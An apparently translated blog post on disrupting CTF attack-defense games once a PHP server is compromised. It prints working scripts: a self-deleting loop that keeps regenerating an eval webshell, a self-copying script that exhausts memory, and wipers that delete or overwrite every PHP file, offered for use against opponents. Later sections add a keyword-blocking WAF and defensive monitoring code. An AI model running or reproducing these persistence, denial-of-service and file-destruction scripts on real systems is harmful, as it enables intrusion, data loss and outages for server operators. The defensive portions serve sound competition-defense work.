On how to stir shit in CTF competitions
0x00 Preface
A CTF where you can't stir shit is not a good CTF, and a challenge where you can't stir shit is not a good challenge.
I very much agree with Phithon's words: "A competition is the process of competing with others; using all kinds of means to stop opponents from scoring is, I think, also a kind of ability."
Being able to do what others can't is exactly what makes you capable.
Everything in this article assumes you can already getshell!!! And if you run into Phithon's "CTF Organizer's Guide to Fighting Shit-Stirrers", it's GG.
0x01 Background knowledge
Most challenges where you can make trouble are PHP and need to be getshelled first, so the only real prerequisite is understanding basic PHP syntax ~
Next, some special PHP built-in functions.
ignore_user_abort()
Sets whether the script is aborted when the client disconnects.
When PHP runs as a command-line script and the script's terminal goes away, the script is not killed immediately; it dies the next time it tries to output something, unless value is set to TRUE.
    ignore_user_abort(1);
set_time_limit()
Sets the maximum execution time of a script.
Sets the number of seconds the script is allowed to run. If this limit is exceeded, the script returns a fatal error. The default is 30 seconds, or the value of max_execution_time in php.ini if one is defined. Passing 0 removes the limit.
    set_time_limit(0);
ini_get()
Gets the value of a configuration option.
Returns the value of the configuration option on success.
    echo 'disable_functions=' . ini_get('disable_functions');
file_put_contents()
Writes a string to a file.
Equivalent to calling fopen(), fwrite() and fclose() in sequence.
    file_put_contents($filename, $content);
file_get_contents()
Reads an entire file into a string.
Like file(), except that file_get_contents() returns the file as a single string, reading up to maxlen bytes starting at the position given by offset. On failure file_get_contents() returns FALSE.
Of course, this function can also read content through other protocols, for example a URL:
    file_get_contents($filename);
    file_get_contents($url);
unlink()
Deletes a file.
Deletes filename. Similar to the Unix C unlink() function. On failure an E_WARNING is raised.
    unlink($filename);
Add set_time_limit(0) and ignore_user_abort(1) to a PHP script and it becomes memory-resident: it keeps running after the client disconnects.
Once that has happened, basically only restarting PHP gets rid of it.
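From the defender's side, the PHP-FPM pool setting that actually kills such a resident worker is request_terminate_timeout, which the FPM master enforces regardless of set_time_limit(). The fragment below is an added example, not from the original post; the 30s value is an assumption to adapt to the application.

```ini
; php-fpm pool config (e.g. www.conf). Weak (the default): 0 = never kill a worker,
; so a script that called set_time_limit(0) + ignore_user_abort(1) runs until restart.
request_terminate_timeout = 0

; Hardened: the FPM master kills any worker still busy after 30s, no matter what the
; script set with set_time_limit(); the looping scripts below then die on their own.
request_terminate_timeout = 30s
```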
0x02 The shit-stirring immortal bird
no_die_shell.php
    <?php
    set_time_limit(0);        // no execution time limit
    ignore_user_abort(1);     // keep running after the client disconnects
    unlink(__FILE__);         // delete ourselves so nobody notices
    file_put_contents(__FILE__, '');
    while (1) {
        // keep regenerating the webshell forever
        file_put_contents('path/webshell.php', '<?php @eval($_POST["password"]);?>');
    }
    ?>
First it deletes itself so nobody knows it is there, then it loops forever regenerating your webshell in some directory; go ahead and delete the shell, it just comes back ~~
0x03 The shit-stirring bomb
nuclear_bomb.php
    <?php
    set_time_limit(0);
    ignore_user_abort(true);
    while (1) {
        // randstr(): a random-filename helper, not defined in the original post
        file_put_contents(randstr() . '.php', file_get_contents(__FILE__));
        file_get_contents("http://127.0.0.1/");
    }
    ?>
From the code, the function of this script is obvious.
Once resident, it enters an infinite loop.
Inside the loop it uselessly copies itself over and over and keeps requesting the web service.
The result is memory exhaustion: PHP is GG, and in bad cases the Docker container is GG too.
0x04 The shit-stirring reaper
del.php
    <?php
    set_time_limit(0);
    ignore_user_abort(1);
    array_map('unlink', glob("some/dir/*.php"));
    ?>
del_or_change.php
    <?php
    set_time_limit(0);
    ignore_user_abort(1);
    unlink(__FILE__);
    function getFiles($path) {
        foreach (glob($path) as $afile) {
            if (is_dir($afile)) {
                // note: glob('*.php') only returns .php files, so subdirectories
                // below the first level are never descended into
                getFiles($afile . '/*.php');
            } else {
                @file_put_contents($afile, "#Anything#");  // rewrite the content ...
                unlink($afile);                             // ... or delete it outright
            }
        }
    }
    while (1) {
        getFiles(__DIR__);
        sleep(10);
    }
    ?>
Walk the directory, collect all the PHP files, then either rewrite their contents or delete them outright, depending on your mood.
There are many ways to walk a directory, but most of those functions are usually disabled (disable_functions).
Occasionally one slips through, such as glob~~ This function is relatively obscure, so that is what it is used for here.
If unlink is banned so you can't delete, rewrite instead.
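The natural defence against the scripts in 0x02 through 0x04 is file-integrity monitoring of the web root: a regenerated shell shows up as an added file, del.php as removed files, and del_or_change.php as modified ones. The monitor below is an added example (not the post's code); the directory tree and file contents are constructed for the demo, and it assumes PHP 7.1 or later.

```php
<?php
// Snapshot the SHA-256 of every .php file below $dir (recursive, unlike the glob-based
// scripts above), keyed by path, so two snapshots can be compared.
function snapshot(string $dir): array {
    $hashes = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if ($file->isFile() && $file->getExtension() === 'php') {
            $hashes[$file->getPathname()] = hash_file('sha256', $file->getPathname());
        }
    }
    ksort($hashes);
    return $hashes;
}

// Report what appeared, vanished or changed between two snapshots.
function diffSnapshots(array $old, array $new): array {
    $modified = array_filter(array_intersect_key($new, $old),
        function ($hash, $path) use ($old) { return $old[$path] !== $hash; },
        ARRAY_FILTER_USE_BOTH);
    return array(
        'added'    => array_keys(array_diff_key($new, $old)),  // e.g. a regenerated webshell
        'removed'  => array_keys(array_diff_key($old, $new)),  // e.g. del.php's unlink()
        'modified' => array_keys($modified),                   // e.g. "#Anything#" overwrites
    );
}

// Constructed demo tree in a temp directory.
$root = sys_get_temp_dir() . '/awd_demo_' . bin2hex(random_bytes(4));
mkdir("$root/lib", 0700, true);
file_put_contents("$root/index.php", "<?php echo 'hello';");
file_put_contents("$root/lib/db.php", "<?php \$dsn = 'mysql:host=localhost';");
$baseline = snapshot($root);

// Simulate what the 0x02 and 0x04 scripts do to the tree.
file_put_contents("$root/shell.php", "<?php /* constructed stand-in for a dropped shell */");
file_put_contents("$root/lib/db.php", "#Anything#");
unlink("$root/index.php");

print_r(diffSnapshots($baseline, snapshot($root)));
// added: shell.php; removed: index.php; modified: lib/db.php
```

In an attack-defense round you would run snapshot() from a loop or cron against a baseline taken from a clean copy and restore anything listed under 'removed' or 'modified'.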
0x05 The shit-stirring WAF
I think this killer tool is a bit evil. In offline (attack-defense) rounds it is almost invincible; I have no good way to break it.
It really annoys people.
php_waf_and_log_to_txt.php
    <?php
    error_reporting(0);
    define('LOG_FILENAME', 'log.txt');
    function waf()
    {
        // polyfill for SAPIs that lack getallheaders()
        if (!function_exists('getallheaders')) {
            function getallheaders() {
                $headers = array();
                foreach ($_SERVER as $name => $value) {
                    if (substr($name, 0, 5) == 'HTTP_')
                        $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
                }
                return $headers;
            }
        }
        $get = $_GET;
        $post = $_POST;
        $cookie = $_COOKIE;
        $header = getallheaders();
        $files = $_FILES;
        $ip = $_SERVER["REMOTE_ADDR"];
        $method = $_SERVER['REQUEST_METHOD'];
        $filepath = $_SERVER["SCRIPT_NAME"];
        // Rewrite shells uploaded by others: keep the content for the log,
        // then clobber the temp file so the upload is useless
        foreach ($_FILES as $key => $value) {
            $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
            file_put_contents($_FILES[$key]['tmp_name'], "virink");
        }
        unset($header['Accept']); // fix a bug: an Accept header such as */* would trip the \* rule
        $input = array("Get" => $get, "Post" => $post, "Cookie" => $cookie, "File" => $files, "Header" => $header);
        // Deal with: one rule per "|"-separated token, each matched case-insensitively
        $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex";
        $pattern .= "|file_put_contents|fwrite|curl|system|eval|assert";
        $pattern .= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
        $pattern .= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
        $vpattern = explode("|", $pattern);
        $bool = false;
        foreach ($input as $k => $v) {
            foreach ($vpattern as $value) {
                foreach ($v as $kk => $vv) {
                    // note: $vv may itself be an array (nested params, each $_FILES entry);
                    // preg_match() then fails silently and that value goes unchecked
                    if (preg_match("/$value/i", $vv)) {
                        $bool = true;
                        logging($input);
                        break;
                    }
                }
                if ($bool) break;
            }
            if ($bool) break;
        }
    }
    function logging($var) {
        file_put_contents(LOG_FILENAME, "\r\n" . time() . "\r\n" . print_r($var, true), FILE_APPEND);
        die(); // or, instead of dying, drop the inputs: unset($_GET, $_POST, $_COOKIE);
    }
    waf();
    ?>
This WAF is definitely a big killer in online attack-defense games.
It not only blocks most malicious requests but also records all attack traffic, so you easily get other people's payloads.
I don't know how the organizers plan to deal with this WAF.
Of course, this WAF is far from perfect; add more rules to make it stronger!
Next, how to load this WAF in practice.
Depending on your privileges, there are different ways to load it.
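To make "adding rules" safe to do, it helps to have the WAF's matching core as a pure function that can be exercised offline. The block below is an added example, not the post's code: it walks nested arrays (so the 'content' of uploaded files is actually scanned), uses \b word boundaries on keyword rules so that "android" no longer trips the "and" rule, and takes the log path as a parameter so it can live outside the document root. The sample requests are constructed; it assumes PHP 7.1 or later.

```php
<?php
// Keyword rules get word boundaries; operator rules are matched as written.
const WAF_KEYWORDS = ['select', 'insert', 'update', 'delete', 'union', 'into', 'load_file',
    'outfile', 'dumpfile', 'eval', 'assert', 'system', 'exec', 'passthru', 'shell_exec',
    'popen', 'proc_open', 'pcntl_exec', 'file_put_contents', 'and', 'or'];
const WAF_OPERATORS = ['\.\./', '/\*', '`'];

function wafRules(): array {
    $rules = array_map(function ($kw) { return '#\b' . preg_quote($kw, '#') . '\b#i'; },
                       WAF_KEYWORDS);
    foreach (WAF_OPERATORS as $re) { $rules[] = "#$re#i"; }
    return $rules;
}

// Returns null if the request is clean, else [key path, rule] of the first hit.
// Recurses into arrays, so nested parameters and $_FILES entries are checked too.
function wafScan(array $input, array $rules, string $path = ''): ?array {
    foreach ($input as $k => $v) {
        $here = $path === '' ? (string)$k : "$path.$k";
        if (is_array($v)) {
            if ($hit = wafScan($v, $rules, $here)) return $hit;
            continue;
        }
        foreach ($rules as $re) {
            if (preg_match($re, (string)$v)) return [$here, $re];
        }
    }
    return null;
}

// One JSON line per blocked request; $logfile should sit outside the web root.
function wafLog(string $logfile, array $hit, array $input): void {
    $line = json_encode(['time' => date('c'), 'ip' => $_SERVER['REMOTE_ADDR'] ?? '-',
                         'hit' => $hit, 'input' => $input]) . "\n";
    file_put_contents($logfile, $line, FILE_APPEND | LOCK_EX);
}

// Constructed requests standing in for $_GET / $_POST / $_FILES.
$rules  = wafRules();
$benign = ['Get' => ['q' => 'android tablets', 'sort' => 'order'], 'Post' => []];
$attack = ['Get' => ['id' => '1 union select 1,2,3'], 'Post' => []];
$upload = ['File' => ['img' => ['name' => 'a.jpg', 'content' => '<?php eval(/* constructed */);']]];
var_dump(wafScan($benign, $rules));   // NULL: "android"/"order" are not false positives
var_dump(wafScan($attack, $rules));   // ["Get.id", "#\bselect\b#i"]
var_dump(wafScan($upload, $rules));   // ["File.img.content", "#\beval\b#i"]
```

In the real hook you would call wafScan() on the same array the 0x05 WAF builds, then wafLog() and die() on a hit.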
Have root privileges
Then it's simple: write it straight into the configuration.
    vim php.ini
    ; prepend, not append: the WAF has to run before the page it protects
    auto_prepend_file = "/dir/path/phpwaf.php"
Restart Apache or PHP-FPM and it takes effect.
Of course, it can also be written into .user.ini (PHP-FPM / CGI) or .htaccess (mod_php):
    ; .user.ini
    auto_prepend_file = "/dir/path/phpwaf.php"
    # .htaccess
    php_value auto_prepend_file "/dir/path/phpwaf.php"
Only user privileges
If you can't write to system configuration, all that's left is the code itself, i.e. file inclusion.
There are several ways to include it, too.
For a framework application, add it to the entry file, e.g. index.php;
for a non-framework application, include it in a shared file such as the config file config.php:
    include('phpwaf.php');
Another option is to replace index.php: rename index.php to index2.php, then rename phpwaf.php to index.php.
Of course, the original phpwaf.php must then include the original index.php:
    index.php -> index2.php
    phpwaf.php -> index.php
    include('index2.php');
Which way you use is up to your mood; whatever makes you happy is fine.
0x06 Concluding remarks
The purpose of this article is not to get everyone stirring shit in CTFs; after all, CTF is a proper competition that helps us learn more techniques and black magic.
And the server maintenance staff work hard too.
We are there to beat the challenges, so why make life hard for ops? (Unless the ops person is also the challenge author, then it's an exception!!!)
I hope you read this article with the right mindset: "PHP is the best language in the world", and there is still a lot to dig into.
Organizers, please don't hit me.